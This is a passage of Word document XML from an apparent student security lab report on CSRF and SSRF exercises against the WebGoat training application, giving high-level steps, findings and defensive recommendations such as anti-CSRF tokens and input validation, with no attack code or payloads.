      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA4260" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D15C68" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mitigating Identified Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2BB1A" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement anti-CSRF tokens to validate and authenticate user actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2060AC90" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Improving Security Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C8DB2B" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Train developers on secure coding practices, emphasizing the importance of anti-CSRF measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CC5B5" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689765D" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228E9DD0" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Lessons Learned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5448E7BD" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recognizing the significance of implementing effective anti-CSRF measures to prevent manipulation via developer tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADAA6CC" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEF19D3" w14:textId="31D2B0F0" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Future Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE7729" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Conduct thorough security testing, including assessments of the impact of developer tool manipulation on web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23849EF4" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEE52FD" w14:textId="5FA78D7B" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cybersecurity Principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6F830" w14:textId="0734DB73" w:rsidR="00713A90" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Illustrates the need for comprehensive defense mechanisms against CSRF, considering various attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90E717" w14:textId="2AD4BA16" w:rsidR="00713A90" w:rsidRPr="00BB4AF9" w:rsidRDefault="00713A90" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0744EE97" w14:textId="2A85D39F" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D449B2" w14:textId="5A0FAA34" w:rsidR="00713A90" w:rsidRPr="00B71190" w:rsidRDefault="00B71190" w:rsidP="00B71190">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71190">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA711E2" w14:textId="60C261B3" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3358DBF1" w14:textId="7283D00C" w:rsidR="00713A90" w:rsidRDefault="001E3E19" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="297DD6A8" wp14:editId="03A1698E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1246371</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>2612256</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1136015" cy="852170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2067155656" name="Picture 10" descr="A computer screen with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55656" name="Picture 10" descr="A computer screen with a black and whit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36015" cy="852170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29CA2935" wp14:editId="50E17188">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>105410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>2616835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1024255" cy="767715"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1158097756" name="Picture 9" descr="A computer screen with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97756" name="Picture 9" descr="A computer screen with a messa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4255" cy="767715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B1136" w14:textId="77AA4C6E" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25989A4D" w14:textId="5065F564" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2470F2EE" w14:textId="1A06D436" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EB4839" w14:textId="0AFD5FB7" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBA5589" w14:textId="07F88440" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DA53D8" w14:textId="61A38C2B" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="001E3E8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFBE6BA" w14:textId="5BA05755" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="00E22F5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D4BF4C" w14:textId="0910C37D" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="00E22F5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1ACA04" w14:textId="0550D8BB" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="00E22F5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A818DF" w14:textId="4706A58E" w:rsidR="00713A90" w:rsidRDefault="00713A90" w:rsidP="00E22F5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB7DAEE" w14:textId="7CD9CAFD" w:rsidR="0007639D" w:rsidRPr="00E22F5E" w:rsidRDefault="00E22F5E" w:rsidP="00E22F5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A 10-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0007639D" w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Server Side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0007639D" w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA3D80" w14:textId="546736D6" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Server-Side Request Forgery (SSRF) Assessment on WebGoat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7651C8" w14:textId="042F45A2" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective: Assess the susceptibility of WebGoat to Server-Side Request Forgery attacks. Identify potential vulnerabilities that could allow an attacker to make unauthorized requests to internal resources or third-party services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C5047" w14:textId="4D74057A" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70109FD6" w14:textId="0B95D411" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology: Utilized browser Development Tools and Network tab to intercept and analyze HTTP requests. Explored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality to identify areas susceptible to SSRF attacks. The goal is to manipulate the server into making unintended requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0D219" w14:textId="68CED3A3" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E18DE94" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F90E8" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3506F683" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Explored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> features to identify potential areas where user inputs influence server-side requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672BDE86" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Leveraged browser Development Tools to intercept and inspect requests made by WebGoat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190499D7" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attempted SSRF attacks by manipulating input parameters to make unintended requests to internal resources or external services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E9ACE" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analyzed the responses to SSRF attacks to understand the impact and potential security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5B889" w14:textId="77777777" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Documented key steps and findings with screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24961F" w14:textId="264E4E59" w:rsidR="00E22F5E" w:rsidRDefault="00E22F5E" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77154897" w14:textId="76DAF00B" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068ECD7B" w14:textId="17304891" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6DAE7E" w14:textId="0085280C" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSRF Vulnerabilities Identified: Discovered potential vulnerabilities where user-controlled inputs influence server-side requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBE434" w14:textId="0DBE7A7C" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unauthorized Access: Successfully demonstrated the ability to make unintended requests to internal resources or third-party services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE5CDC" w14:textId="75EE4EAB" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes: Illustrates the risk of SSRF attacks, where an attacker can exploit the server to access sensitive information or perform actions on behalf of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D1FB8" w14:textId="2F92C740" w:rsidR="00B144C6" w:rsidRPr="00E22F5E" w:rsidRDefault="00B144C6" w:rsidP="00E22F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6875E" w14:textId="5F4A4619" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B423D3" w14:textId="67ACC0B6" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise emphasizes the importance of securing against SSRF attacks, as they can lead to unauthorized access and compromise the confidentiality and integrity of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF271A" w14:textId="2B65404B" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1BD4EE" w14:textId="18856429" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4890D" w14:textId="3A6CE970" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CA825A" w14:textId="0D6E7742" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement input validation and sanitization for user-controlled inputs to prevent SSRF vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF78D3D" w14:textId="702D1C65" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
